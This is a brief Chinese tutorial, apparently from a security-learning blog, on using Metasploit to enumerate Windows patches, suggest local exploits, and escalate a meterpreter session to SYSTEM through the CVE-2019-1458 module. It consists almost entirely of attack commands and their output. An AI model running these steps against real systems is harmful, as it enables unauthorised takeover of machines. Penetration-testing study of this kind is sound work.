使用msf查询补丁和可利用提权漏洞

# 查询补丁

meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

# 查询Exp

msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

上一篇:kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7


下一篇:20181207朱涛《网络对抗技术》Exp6 MSF应用基础